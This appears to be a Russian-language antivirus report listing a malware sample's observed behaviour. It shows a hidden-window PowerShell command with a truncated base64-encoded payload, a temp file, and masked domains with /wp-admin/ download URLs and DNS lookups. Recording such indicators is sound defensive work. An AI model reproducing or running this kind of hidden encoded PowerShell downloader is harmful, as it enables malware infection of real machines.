Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGMAcABxAHoAawB2AHEAegBnAD0AJwBXAHQAawB2AGMAYwBxAGoAYQBkAHIAeQBwACcAOwAkAEwAYgBvAHIAdgBsAHoAYQB1AG0AdgBjAHMAIAA9ACAAJwA1ADYANQAnADsAJABTAG8AZQB4AGsAdQB1AG4AcgBwAG4APQAnAEwAcAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1600
- %TEMP%\1131958.cvr
- 'tw##p.com':80
- 'sp##sho.org':80
- 'sp##sho.org':443
- http://tw##p.com/wp-admin/afqoiy/
- http://www.tw##p.com/wp-admin/afqoiy/
- http://sp##sho.org/wp-admin/86iuflc/
- 'sp##sho.org':443
- DNS ASK tw##p.com
- DNS ASK ye####atirli.com
- DNS ASK sp##sho.org
- DNS ASK hu####.#kmtechnologies.com
- DNS ASK bi####g.wpkami.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGMAcABxAHoAawB2AHEAegBnAD0AJwBXAHQAawB2AGMAYwBxAGoAYQBkAHIAeQBwACcAOwAkAEwAYgBvAHIAdgBsAHoAYQB1AG0AdgBjAHMAIAA9ACAAJwA1ADYANQAnADsAJABTAG8AZQB4AGsAdQB1AG4AcgBwAG4APQAnAEwAcAB...' (со скрытым окном)